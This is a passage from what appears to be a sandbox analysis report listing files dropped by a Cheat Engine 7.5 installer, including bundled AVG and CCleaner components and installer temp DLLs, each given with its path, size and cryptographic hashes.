                                      40ad5f9e00ea65cddd77da2ba1b9983e5b6d43ff40dc794536d2557bc44a279b2bd6321809f020619e9be4a6f107a381b166e07eba313b6560f75d4de229d110

                                    • C:\Program Files\AVG\Antivirus\setup\ais_avg_crt_x86-7d5.vpx

                                      Filesize

                                      2.4MB

                                      MD5

                                      776c702244f080a64ee0769e4115806b

                                      SHA1

                                      1c75f4d486e56dd9902e778392afdd7ae4027bc6

                                      SHA256

                                      183c0c047612f225bec9ef90094385efb204b5743a2492f6c574f2eae778aefe

                                      SHA512

                                      1d1e80c72550435ac4d60eaa7357c200658811991e817b9baf8c1c305845410874b5b4867552455ebcb3f7c6cc3318ee4a85d679a3d049c3a7ab5d6493651995

                                    • C:\Program Files\AVG\Antivirus\setup\ais_cmp_bpc-7cc.vpx

                                      Filesize

                                      263B

                                      MD5

                                      370fb8113ca63fa92f7037df74050faf

                                      SHA1

                                      2ed9d4164c5dafbd38dc0dee0f3edf7ccabfe411

                                      SHA256

                                      79421461dd25e721147e2e676b0c33c5fc3897126bb5f700e8f60e0d34175ce4

                                      SHA512

                                      c197ad2368d138af4f0f220ffa16d47e29bbe8456e19bd097ac3fbf16fd47439218a77546312d5eeb356f7fe6ab5ecdc16f010710b1b89f75f6175a6632c3909

                                    • C:\Program Files\AVG\Antivirus\setup\ais_cmp_datascan_x64-82e.vpx

                                      Filesize

                                      2.0MB

                                      MD5

                                      dfb14bc06277ac67224bba3003fc0346

                                      SHA1

                                      816c68c5489945b99dec636d7f7b13d10f732cc4

                                      SHA256

                                      3b50c86e7f04de527544c097fd2dfc9111c351f7fb3507fe8105cb899f69a1f5

                                      SHA512

                                      76957d380dd4c612c634ceb660a28d872182be35979155be0cde4f618677fe0fa31cc5d7bc7f768f5fdb0a2af33163e94950dec836cc09281dad13227c06c68e

                                    • C:\Program Files\AVG\Antivirus\setup\ais_cmp_gamingmode-875.vpx

                                      Filesize

                                      3.0MB

                                      MD5

                                      bd3e424da9ff6e08b2710abd7b30cb48

                                      SHA1

                                      6a4cc2769d6a5add0ce9ee6f6f2740ac43069cb4

                                      SHA256

                                      5e4bec388a3e16c54250fb5a4143271202226962e2e80bdd97b8c25eb07020bf

                                      SHA512

                                      edb241b1808503236472a291068b729821bf6a38ec839f1bd4c70c326e97bf8e3277294986a01d15cb7f083fe8fea88a0c86b79f3a15cb19ac447459d501d777

                                    • C:\Program Files\AVG\Antivirus\setup\ais_cmp_swhealth_x64-82e.vpx

                                      Filesize

                                      62KB

                                      MD5

                                      db7a407c200d1da0694f5c4ef6a92f15

                                      SHA1

                                      870648a412aeea32ccc03dc72f502ccd0eb1cea8

                                      SHA256

                                      5f0fee031ab19ff41278afba5f1b9eacf022d1c632e1b6bf3e777fefe837533e

                                      SHA512

                                      286490a278688967bc7bd85d6bea4b70d4bef80d47b49551f9b5354362dcfe94ea2d22a76e5b1558855b385dafee6052d3311b78ba43e3a281a27686bf9a9b2b

                                    • C:\Program Files\AVG\Antivirus\setup\ais_dll_eng-818.vpx

                                      Filesize

                                      16KB

                                      MD5

                                      953cc8dab407cc320911adb8358fcd49

                                      SHA1

                                      4ecd20b724ca5718b87d2cd27745003902df2534

                                      SHA256

                                      748a4fda0713ac82afedd5c2f90848fbb743772f4c6268e70ee65285bbc48c7a

                                      SHA512

                                      ecb068dfb5334ecada79e0eee629bc7d4a10bf3fc7ec0044f8747e7137f65f466f5d0d6a0bc5ad9af0c6748b695a153baf431888e1df32433d8276c44b824174

                                    • C:\Program Files\AVG\Antivirus\setup\ais_dll_eng_x64-82e.vpx

                                      Filesize

                                      327KB

                                      MD5

                                      a469beb68e45ce02e4e541744a95783d

                                      SHA1

                                      32d05acc7b266fced0a014ad07843625b1908d1a

                                      SHA256

                                      ea9301a1fa0ed024ba39947e9a76822c52c978397d25d0edca66d234ca012a8a

                                      SHA512

                                      a1bd6a24ceb0fdd07a13baae4e0a1b98ab22fe702cac4cc5f8acf182ba28879ba6c27c2b66a44a77261b16b5aec5608e0a2f18f62ee6f416a9baeb88bbb8a8df

                                    • C:\Program Files\AVG\Antivirus\setup\ais_gen_openssl_x64-7de.vpx

                                      Filesize

                                      4.1MB

                                      MD5

                                      8bf394954e553ddc521ee8a2657f04c8

                                      SHA1

                                      c0da8c344e073ead1bfc9bfe362adc564d9340eb

                                      SHA256

                                      40809b1bda7fb34ecacac1e39f9d23d563178b68595f376076291a7e6de96cdf

                                      SHA512

                                      e16828e05f4929b3e25399d311bb2f04aacf99a37fb52663fb8b4dbe77438323bb9faf1437bef025187cb9d3ef8954259614ae9932d0d587a4b9eff9de3dc3f4

                                    • C:\Program Files\AVG\Antivirus\setup\ais_gen_protobuf_x64-7d0.vpx

                                      Filesize

                                      2.4MB

                                      MD5

                                      c8c85dcc856b13655d5545152f06813e

                                      SHA1

                                      2f54faa811dc8ec09ece27b09c20d6f4d19c4902

                                      SHA256

                                      6019fb4816f72279ca066066a6ae142045dbafb518c37b0d3f04d486e13bb5db

                                      SHA512

                                      5e033cb69ece704f00b7ca9df37ab691571e77eda7bcbc3af10fbf61613a97308ff7db60a8fb669c054df1c51b0757747fc40d43e39fc9a8dd2862504dca83c2

                                    • C:\Program Files\AVG\Antivirus\setup\ais_gen_streamfilter_x64-866.vpx

                                      Filesize

                                      211KB

                                      MD5

                                      2641147e9142c41d9761b2da182c4619

                                      SHA1

                                      6cd4a9f62ae449ec3ef636e544b53686ed24d855

                                      SHA256

                                      199103456394b7ea5c6f99b02bcb452145f76f1b6d02b357f84e568b67b1e63d

                                      SHA512

                                      2e2839c794a82a2afd19697fd242647848488454d85bed1bcba128c2cfcbd9eab3f0f16c6436542deeb866413f52156df5a9108b8be2451d7e1e68720f539ae5

                                    • C:\Program Files\AVG\Antivirus\setup\ais_gen_tools-876.vpx

                                      Filesize

                                      5.6MB

                                      MD5

                                      381589781f4135200bdc051e91ebf475

                                      SHA1

                                      488c8b48cedad2c41e4abca633f945e085908c99

                                      SHA256

                                      242a94d0286752458090e2dbd1659ce810ad45df0b01fbde25fbf0ecbdea662c

                                      SHA512

                                      02d46326ad0d0f7a609dadb2381e91ca0fcb5948c42dedaa0a96ccfea36b3d18db9df87ce3e20c4ce03cd107268e51a5e03c11103f6dded601517450434a3903

                                    • C:\Program Files\AVG\Antivirus\setup\ais_shl_mai_x64-82e.vpx

                                      Filesize

                                      2.7MB

                                      MD5

                                      4d86fe20b63352358b7dc30c6caece40

                                      SHA1

                                      30d5d0b17799af42956d8c7e8f7ef008fc3d2f17

                                      SHA256

                                      795f2004278e2a03017ae204e6dda07d866a00ae6623bb1902ff66c89c1b0650

                                      SHA512

                                      97de3a30ffd823dac407763334bdf8bb888f5b1ea80caf91a3e43c4d11274648a387ef32dcea28ea95c9d8aa38e3908bd3cce68620ff894f0b3ddf343f748f20

                                    • C:\Program Files\AVG\Antivirus\setup\jrog2-15ee.vpx

                                      Filesize

                                      1.4MB

                                      MD5

                                      0aaecbab1727daa61a75b91275c9d1ee

                                      SHA1

                                      67d281e68eca301679df55b934f08c14ab3f1146

                                      SHA256

                                      ecc90968bb2f9bd723f637e7810dc3c665822910e7c14396b29298f4e65a87ef

                                      SHA512

                                      9a9dcc3ca4eb7ffc4204f41845e6d6c7dac6fedd49e2ed3d01ebdff71895df9868f4604d5c0e8a38e189ec360d5212e20e0ddc30fb3cb5f6acb9dac0490ec9ff

                                    • C:\Program Files\AVG\Antivirus\setup\vps_binaries-15cb.vpx

                                      Filesize

                                      4.9MB

                                      MD5

                                      9c9541bb7ac23d630e5f7220153a20d8

                                      SHA1

                                      f74fc249fc1696255beeb958f3eac2de7181e25e

                                      SHA256

                                      621e7d4dff6639e32aab58bd6b38ff7af25a5f39ebb1793ffff5ef3183041039

                                      SHA512

                                      5f3a119d8fe8b220f83dfe0f14f6c64f70c72ff6170fc173e31bb4763d2831f1955cbaa802e18cac0d51fe1622394f89bad541e3e32b28a7a5780f170c8038a0

                                    • C:\Program Files\CCleaner\CCUpdate.exe

                                      Filesize

                                      809KB

                                      MD5

                                      943a4f169e9a3303ed6defc1ac3690bd

                                      SHA1

                                      e0bd76b866624164c10b85d37efb6474b84164df

                                      SHA256

                                      e531742a357907248de84b99f68ed7e8edd70e7ca918d21b24cc17ee4c128240

                                      SHA512

                                      da29cafdd63fd3ab3d2378fc6c2810d7579ebd6b62a4f99248458094cd2e42dc0071b83f0aee4185ca1c81139dec2991212ac383d77a737937558bbcb29d688c

                                    • C:\Program Files\CCleaner\CCleaner64.exe

                                      Filesize

                                      43.3MB

                                      MD5

                                      056de61953480aaefcac69f0a0b8a4e1

                                      SHA1

                                      2c9215ab9a9d8d223f37406c776f96af56a977f4

                                      SHA256

                                      52bc5767851c6a39b620328dd2697bf0826db700e81333e90c8b462b7c3efe59

                                      SHA512

                                      ce64f0a7a020d0ecacde341aeacc77b0f8bcd3b59aba9b8a32a7e92b87664cf3e830521a6154febe25b5911b7a45fc45b96829f3a3ed4f25854355cf09ac7bd7

                                    • C:\Program Files\CCleaner\Setup\359d8f54-c99b-439e-ab03-605358be04e5.dll

                                      Filesize

                                      469KB

                                      MD5

                                      fe6f58fb55d9a93502528c3c9bb13a3f

                                      SHA1

                                      516275dddbc9e2f056342201b03a0931d93a6239

                                      SHA256

                                      c427bcf6b065edf06662e0540e3e9a21c07095184e7bb9d05926dc3b79fc3348

                                      SHA512

                                      7f45f187d6c3156b89e2daf0c2bfdc60a59140ff94f8255fa672422abc43aa1252b0fe0fa0a3ef675f9e71c33b26424597c015db83dec7f5e20ee8769c61c619

                                    • C:\Program Files\CCleaner\Setup\3aff7efb-834d-4988-a00d-7fa3a3bdb7f8.ini

                                      Filesize

                                      170B

                                      MD5

                                      2af9f69df769f876f6e02da18e966020

                                      SHA1

                                      5d21312d9bd23a498a294844778c49641a63d5e2

                                      SHA256

                                      473d48a44a348f6c547aefd2c60dd4b9de0092e1fb94a7611bdd374783ef3b2c

                                      SHA512

                                      a4705e5491cf03867fd46e63293181bf761d04fe0cccb86e373dd567c68d646634f64ef95d5b910d2266468b93bf7cdf6f9acbf576c6f42a4ff6c3caa09d2274

                                    • C:\Program Files\CCleaner\Setup\b30e87a4-4d7d-4884-98f4-c7e064dd4e6c.xml

                                      Filesize

                                      967B

                                      MD5

                                      1c5fdef6eeabb6f625c80a521a0be324

                                      SHA1

                                      c59d8ce0aca8e19ca99234b38ccec6e599953724

                                      SHA256

                                      b84d81a69244d5c095f811667ca702b70f74202764c3db3e0fa73eda408999c4

                                      SHA512

                                      d6cdc2966f37d1de76159cc9c9c9831f3174ff5d61c6fa97d0058c0dc88bf8385c600a1dadc025432b17fdbea1d6854013b43e76f5d2ce8e44467d8779b9e6e8

                                    • C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe

                                      Filesize

                                      389KB

                                      MD5

                                      f921416197c2ae407d53ba5712c3930a

                                      SHA1

                                      6a7daa7372e93c48758b9752c8a5a673b525632b

                                      SHA256

                                      e31b233ddf070798cc0381cc6285f6f79ea0c17b99737f7547618dcfd36cdc0e

                                      SHA512

                                      0139efb76c2107d0497be9910836d7c19329e4399aa8d46bbe17ae63d56ab73004c51b650ce38d79681c22c2d1b77078a7d7185431882baf3e7bef473ac95dce

                                    • C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe

                                      Filesize

                                      236KB

                                      MD5

                                      9af96706762298cf72df2a74213494c9

                                      SHA1

                                      4b5fd2f168380919524ecce77aa1be330fdef57a

                                      SHA256

                                      65fa2ccb3ac5400dd92dda5f640445a6e195da7c827107260f67624d3eb95e7d

                                      SHA512

                                      29a0619093c4c0ecf602c861ec819ef16550c0607df93067eaef4259a84fd7d40eb88cd5548c0b3b265f3ce5237b585f508fdd543fa281737be17c0551163bd4

                                    • C:\Program Files\Cheat Engine 7.5\badassets\is-O372G.tmp

                                      Filesize

                                      5KB

                                      MD5

                                      5cff22e5655d267b559261c37a423871

                                      SHA1

                                      b60ae22dfd7843dd1522663a3f46b3e505744b0f

                                      SHA256

                                      a8d8227b8e97a713e0f1f5db5286b3db786b7148c1c8eb3d4bbfe683dc940db9

                                      SHA512

                                      e00f5b4a7fa1989382df800d168871530917fcd99efcfe4418ef1b7e8473caea015f0b252cac6a982be93b5d873f4e9acdb460c8e03ae1c6eea9c37f84105e50

                                    • C:\Program Files\Cheat Engine 7.5\unins000.exe

                                      Filesize

                                      3.1MB

                                      MD5

                                      9aa2acd4c96f8ba03bb6c3ea806d806f

                                      SHA1

                                      9752f38cc51314bfd6d9acb9fb773e90f8ea0e15

                                      SHA256

                                      1b81562fdaeaa1bc22cbaa15c92bab90a12080519916cfa30c843796021153bb

                                      SHA512

                                      b0a00082c1e37efbfc2058887db60dabf6e9606713045f53db450f16ebae0296abfd73a025ffa6a8f2dcb730c69dd407f7889037182ce46c68367f54f4b1dc8d

                                    • C:\Program Files\Google\Libs\g.log

                                      Filesize

                                      198B

                                      MD5

                                      37dd19b2be4fa7635ad6a2f3238c4af1

                                      SHA1

                                      e5b2c034636b434faee84e82e3bce3a3d3561943

                                      SHA256

                                      8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

                                      SHA512

                                      86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

                                    • C:\ProgramData\AVG\Persistent Data\Antivirus\Logs\Setup.log

                                      Filesize

                                      1KB

                                      MD5

                                      cbf275e54b0887dea8c126911f99fcd0

                                      SHA1

                                      e2437b6685978a81273939213f6991804c331100

                                      SHA256

                                      fa6717d2952e7dc0676afcc8702702b94e926b0c7aaa9b975f902c3faf458f3a

                                      SHA512

                                      a96664df649024dc96fef0242c3a2c5f46a9f0298cf5beb7f20d9e574363ae5438cf282320992d7d6d501093dbbde2947af637d31f47475f735051d66ade7265

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      62e00c26b3850a9fc2f0c2e504d39298

                                      SHA1

                                      b049d4c1be53fbc7fcd5d740f3a84c1048ea0f5b

                                      SHA256

                                      bb71566efc1479ffec8c686908c9c8662e618941ba5a5afe043d01087dc90b1f

                                      SHA512

                                      cebd252eac547ba22d5f307be32b4802b80c5d4f390e5508ac933c3881109baf82bd3be6b87c3ce2987c5044fa3159ce0c97c1b44fb43b2c8f2303c4c49bf5c7

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      342B

                                      MD5

                                      83608130223cc4b740ed87b68eeccfc4

                                      SHA1

                                      40f91af56b347cb32d777d0bafb20474f7333af3

                                      SHA256

                                      86a6868e0e162c5e84fbe15815ddff8b63c54624a6a7ee37b79e558fe137e15b

                                      SHA512

                                      5a4845291a2e3e4e4ef6e77af1907259d9471c16a9c00e97ffb1460930c27a7ab7d912434eee00bdfd8e5188f3c32697740bf327de9f0d5cc6ec11e4242711ed

                                    • C:\Users\Admin\AppData\Local\Temp\Cab946.tmp

                                      Filesize

                                      70KB

                                      MD5

                                      49aebf8cbd62d92ac215b2923fb1b9f5

                                      SHA1

                                      1723be06719828dda65ad804298d0431f6aff976

                                      SHA256

                                      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                      SHA512

                                      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                    • C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe

                                      Filesize

                                      28.6MB

                                      MD5

                                      ccef241f10766a2e12298fba4d319450

                                      SHA1

                                      955c0a80105b034ed46941845fc9bdbe8187ee64

                                      SHA256

                                      590d28762bc431046a202d7bbafb31f93fbbbc73a3c2291119b5c1139675b579

                                      SHA512

                                      d20a8f5afab8cd819ab81875ba9dba5c5ebb9ceadf4d53bf19e1e99c4f16d1361aa272f49571c69c6cc375afc8ac2f9c2e0293b5f2bf62f85cc5c23dfb3923f2

                                    • C:\Users\Admin\AppData\Local\Temp\SQLite.Interop.dll

                                      Filesize

                                      1.3MB

                                      MD5

                                      0a1e95b0b1535203a1b8479dff2c03ff

                                      SHA1

                                      20c4b4406e8a3b1b35ca739ed59aa07ba867043d

                                      SHA256

                                      788d748b4d35dfd091626529457d91e9ebc8225746211086b14fb4a25785a51e

                                      SHA512

                                      854abcca8d807a98a9ad0ca5d2e55716c3ce26fae7ee4642796baf415c3cfad522b658963eafe504ecaed6c2ecdcdf332c9b01e43dfa342fcc5ca0fbedfe600e

                                    • C:\Users\Admin\AppData\Local\Temp\Tar959.tmp

                                      Filesize

                                      181KB

                                      MD5

                                      4ea6026cf93ec6338144661bf1202cd1

                                      SHA1

                                      a1dec9044f750ad887935a01430bf49322fbdcb7

                                      SHA256

                                      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                      SHA512

                                      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                    • C:\Users\Admin\AppData\Local\Temp\aswac4eeba8b967a4ac.tmp

                                      Filesize

                                      35B

                                      MD5

                                      28d6814f309ea289f847c69cf91194c6

                                      SHA1

                                      0f4e929dd5bb2564f7ab9c76338e04e292a42ace

                                      SHA256

                                      8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015

                                      SHA512

                                      1d68b92e8d822fe82dc7563edd7b37f3418a02a89f1a9f0454cca664c2fc2565235e0d85540ff9be0b20175be3f5b7b4eae1175067465d5cca13486aab4c582c

                                    • C:\Users\Admin\AppData\Local\Temp\is-I0JUN.tmp\CheatEngine75.tmp

                                      Filesize

                                      3.1MB

                                      MD5

                                      e652d75d1d0d3f03b6b730e064e9194c

                                      SHA1

                                      c4220d57971c63a3f0b9f5b68560aedfdec18e64

                                      SHA256

                                      8958b8d498068bd0657587a04aaf011e7eabeb215276694366a154da8b55bdb9

                                      SHA512

                                      e5e5807224f0858d472584d06975dbe75677ad0a00727b63d1f8e2108dae179cb469ebae127be6c8d5b9de192bc741637fe1c8a9a4ef3ae46a3bde76b534a766

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\AVG_AV.png

                                      Filesize

                                      51KB

                                      MD5

                                      aee8e80b35dcb3cf2a5733ba99231560

                                      SHA1

                                      7bcf9feb3094b7d79d080597b56a18da5144ca7b

                                      SHA256

                                      35bbd8f390865173d65ba2f38320a04755541a0783e9f825fdb9862f80d97aa9

                                      SHA512

                                      dcd84221571bf809107f7aeaf94bab2f494ea0431b9dadb97feed63074322d1cf0446dbd52429a70186d3ecd631fb409102afcf7e11713e9c1041caacdb8b976

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\AVG_BRW.png

                                      Filesize

                                      29KB

                                      MD5

                                      0b4fa89d69051df475b75ca654752ef6

                                      SHA1

                                      81bf857a2af9e3c3e4632cbb88cd71e40a831a73

                                      SHA256

                                      60a9085cea2e072d4b65748cc71f616d3137c1f0b7eed4f77e1b6c9e3aa78b7e

                                      SHA512

                                      8106a4974f3453a1e894fec8939038a9692fd87096f716e5aa5895aa14ee1c187a9a9760c0d4aec7c1e0cc7614b4a2dbf9b6c297cc0f7a38ba47837bede3b296

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\CCleaner.png

                                      Filesize

                                      193KB

                                      MD5

                                      7c87614f099c75a0bed6ab01555143dd

                                      SHA1

                                      07ab72dc4a1e53e2c62ecccc1221472854d78635

                                      SHA256

                                      02335420cb5c2fa33eec48f32706d2353f8b609daaf337458f04a8f98d999a7c

                                      SHA512

                                      29b7ce896332ed2a05235645adb963b77920a0a252561684ea9f1f925f69dbcee4685e1b30584c1034a15b7efc18b911902d1ecb41c523cf2552ff23e165bf43

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\logo.png

                                      Filesize

                                      248KB

                                      MD5

                                      9cc8a637a7de5c9c101a3047c7fbbb33

                                      SHA1

                                      5e7b92e7ed3ca15d31a48ebe0297539368fff15c

                                      SHA256

                                      8c5c80bbc6b0fdb367eab1253517d8b156c85545a2d37d1ee4b78f3041d9b5db

                                      SHA512

                                      cf60556817dba2d7a39b72018f619b0dbea36fb227526943046b67d1ae501a96c838d6d5e3da64618592ac1e2fa14d4440baa91618aa66256f99ea2100a427b4

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod0.zip

                                      Filesize

                                      5.7MB

                                      MD5

                                      6406abc4ee622f73e9e6cb618190af02

                                      SHA1

                                      2aa23362907ba1c48eca7f1a372c2933edbb7fa1

                                      SHA256

                                      fd83d239b00a44698959145449ebfcb8c52687327deac04455e77a710a3dfe1b

                                      SHA512

                                      dd8e43f8a8f6c6e491179240bdfefdf30002f3f2900b1a319b4251dfa9ca7b7f87ddf170ba868ab520f94de9cc7d1854e3bcfd439cad1e8b4223c7ee06d649f1

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod0_extract\avg_secure_browser_setup.exe

                                      Filesize

                                      5.8MB

                                      MD5

                                      591059d6711881a4b12ad5f74d5781bf

                                      SHA1

                                      33362f43eaf8ad42fd6041d9b08091877fd2efba

                                      SHA256

                                      99e8de20a35a362c2a61c0b9e48fe8eb8fc1df452134e7b6390211ab19121a65

                                      SHA512

                                      6280064a79ca36df725483e3269bc1e729e67716255f18af542531d7824a5d76b38a7dcefca048022c861ffcbd0563028d39310f987076f6a5da6c7898c1984c

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod1.zip

                                      Filesize

                                      122KB

                                      MD5

                                      56b0d3e1b154ae65682c167d25ec94a6

                                      SHA1

                                      44439842b756c6ff14df658befccb7a294a8ea88

                                      SHA256

                                      434bfc9e005a7c8ee249b62f176979f1b4cde69484db1683ea07a63e6c1e93de

                                      SHA512

                                      6f7211546c6360d4be8c3bb38f1e5b1b4a136aa1e15ec5ae57c9670215680b27ff336c4947bd6d736115fa4dedea10aacf558b6988196f583b324b50d4eca172

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod2.zip

                                      Filesize

                                      3.1MB

                                      MD5

                                      da36b5a73dfd73a64553d73f994d5c79

                                      SHA1

                                      0803098228a1b108d08d08430092557604a658db

                                      SHA256

                                      f062b77b23f27340ae95dbc5df544a57b56b0c96713e9f7582779b2d6299a0b7

                                      SHA512

                                      89d5b6727e1aa6095d372c3321ae239e227de29494835302bb7e2cf8c5b0c1cf83e6079f35d488960518c439f6f07a6421c055e4476dff8a7fb7d613ae4e5817

                                    • C:\Users\Admin\AppData\Local\Temp\is-I7K26.tmp\prod2_extract\CCleaner.exe

                                      Filesize

                                      3.2MB

                                      MD5

                                      99de312b793cf71acf35decd355fd34e

                                      SHA1

                                      c505b09d1ea0093fc046958217853a32370816a5

                                      SHA256

                                      637a4f4f7d6bc22936ab688f63ac83a00d74f3815435cb3e2a21cdddf24dc945

                                      SHA512

                                      eddf27b70248bcff29ecdedf2d6023a82b4a966042ae87ff05e9d9098a84b18f3928ec5e736c9bf58454d661fc1bb24d9d65b46df8fa9fe9a07a94f904256e04

                                    • C:\Users\Admin\AppData\Local\Temp\nseB1A.tmp\UserInfo.dll

                                      Filesize

                                      4KB

                                      MD5

                                      2f69afa9d17a5245ec9b5bb03d56f63c

                                      SHA1

                                      e0a133222136b3d4783e965513a690c23826aec9

                                      SHA256

                                      e54989d2b83e7282d0bec56b098635146aab5d5a283f1f89486816851ef885a0

                                      SHA512

                                      bfd4af50e41ebc56e30355c722c2a55540a5bbddb68f1522ef7aabfe4f5f2a20e87fa9677ee3cdb3c0bf5bd3988b89d1224d32c9f23342a16e46c542d8dc0926

                                    • C:\Users\Admin\AppData\Local\Temp\nseB1A.tmp\a\asdk.dll

                                      Filesize

                                      1.0MB

                                      MD5

                                      e3f60a2cf6b1d155f5f7d17615907013

                                      SHA1

                                      8191871854dcbcc4fe34218040215581b0fccf43

                                      SHA256

                                      74fcd2367fb1d9c0084547ebaf1c6db081946453a5d0a2d668d83d3c489a60a9

                                      SHA512

                                      20a57a1d2ce3d081958b4b3b48f1c902039f26dd28abcac94fad6f20e8e5d630bbfd2365eb7200f7c8d676c593cb3dc465a406e8536abdf63bd7ef76bb86df2b

                                    • C:\Users\Admin\AppData\Local\Temp\nseB1A.tmp\g\gcapi_dll.dll

                                      Filesize

                                      348KB

                                      MD5

                                      2973af8515effd0a3bfc7a43b03b3fcc

                                      SHA1

                                      4209cded0caac7c5cb07bcb29f1ee0dc5ac211ee

                                      SHA256

                                      d0e4581210a22135ce5deb47d9df4d636a94b3813e0649aab84822c9f08af2a0

                                      SHA512

                                      b6f9653142ec00b2e0a5045f0f2c7ba5dbbda8ef39edf14c80a24ecab3c41f081eb466994aaf0879ac96b201ba5c02d478275710e4d08b3debc739063d177f7e

                                    • C:\Users\Admin\AppData\Local\Temp\nseB1A.tmp\nsProcess.dll

                                      Filesize

                                      4KB

                                      MD5

                                      f0438a894f3a7e01a4aae8d1b5dd0289

                                      SHA1

                                      b058e3fcfb7b550041da16bf10d8837024c38bf6

                                      SHA256

                                      30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11

                                      SHA512

                                      f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

                                    • C:\Users\Admin\AppData\Local\Temp\nseB1A.tmp\p\ServiceUninstaller.dll

                                      Filesize

                                      497KB

                                      MD5

                                      3053907a25371c3ed0c5447d9862b594

                                      SHA1

                                      f39f0363886bb06cb1c427db983bd6da44c01194

                                      SHA256

                                      0b78d56aceefb4ff259660bd55bbb497ce29a5d60206b5d19d05e1442829e495

                                      SHA512

                                      226530658b3e1530f93285962e6b97d61f54039c1bbfcbc5ec27e9ba1489864aecd2d5b58577c8a9d7b25595a03aa35ee97cc7e33e026a89cbf5d470aa65c3e8

                                    • C:\Users\Admin\AppData\Local\Temp\nseB1A.tmp\p\pfBL.dll

                                      Filesize

                                      13.5MB

                                      MD5

                                      b3e0d98e1bad2335d9daeff25385a72e

                                      SHA1

                                      7981168cffbe878866798a4da00b8397414e2a22

                                      SHA256

                                      0d8e7bdfa093710857ac3043ffa9da0195e4b7da27be897606d237b3ebb2b8d9

                                      SHA512

                                      ad06aea987d18e482ecbb88e556dc05a7222e44bf9a776a297d4b10c7c4c878ebab63ca77b810086d4160d3fc906b20f958fa4d76c8d1adc1e959a9c34485a8a

                                    • C:\Users\Admin\AppData\Local\Temp\nseB1A.tmp\ui\pfUI.dll

                                      Filesize

                                      9.3MB

                                      MD5

                                      eed7bfbc2c04152e8cb42e0bde72a6a2

                                      SHA1

                                      fc6ab8a59e8beced74e88bef302f4884a0f3da4e

                                      SHA256

                                      48a7afbc60e1a40ef8482fbad6978f93181c64a615e80416f6c253e09474b1da

                                      SHA512

                                      63177d172ddc6b10037c916e3e90349f847b1a9ec57514afa60df8e2e503557542ba555494ce0da6550ac06c5ca155e8e5b608d273b7934b28602899e6bbc928

                                    • C:\Users\Admin\AppData\Local\Temp\nst8BCD.tmp\CR.History.tmp

                                      Filesize

                                      148KB

                                      MD5

                                      90a1d4b55edf36fa8b4cc6974ed7d4c4

                                      SHA1

                                      aba1b8d0e05421e7df5982899f626211c3c4b5c1

                                      SHA256

                                      7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

                                      SHA512

                                      ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

                                    • C:\Users\Admin\AppData\Local\Temp\nst8BCD.tmp\StdUtils.dll

                                      Filesize

                                      195KB

                                      MD5

                                      7602b88d488e54b717a7086605cd6d8d

                                      SHA1

                                      c01200d911e744bdffa7f31b3c23068971494485

                                      SHA256

                                      2640e4f09aa4c117036bfddd12dc02834e66400392761386bd1fe172a6ddfa11

                                      SHA512

                                      a11b68bdaecc1fe3d04246cfd62dd1bb4ef5f360125b40dadf8d475e603e14f24cf35335e01e985f0e7adcf785fdf6c57c7856722bc8dcb4dd2a1f817b1dde3a

                                    • C:\Users\Admin\AppData\Local\Temp\nszCF43.tmp\INetC.dll

                                      Filesize

                                      23KB

                                      MD5

                                      7760daf1b6a7f13f06b25b5a09137ca1

                                      SHA1

                                      cc5a98ea3aa582de5428c819731e1faeccfcf33a

                                      SHA256

                                      5233110ed8e95a4a1042f57d9b2dc72bc253e8cb5282437637a51e4e9fcb9079

                                      SHA512

                                      d038bea292ffa2f2f44c85305350645d504be5c45a9d1b30db6d9708bfac27e2ff1e41a76c844d9231d465f31d502a5313dfded6309326d6dfbe30e51a76fdb5

                                    • C:\Users\Admin\AppData\Local\Temp\nszCF43.tmp\System.dll

                                      Filesize

                                      12KB

                                      MD5

                                      cff85c549d536f651d4fb8387f1976f2

                                      SHA1

                                      d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e

                                      SHA256

                                      8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8

                                      SHA512

                                      531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                      Filesize

                                      7KB

                                      MD5

                                      701e21731e629ea19c036fd6d0660f0c

                                      SHA1

                                      eb014b406f0941762ba0e44ccd22e78837f02384

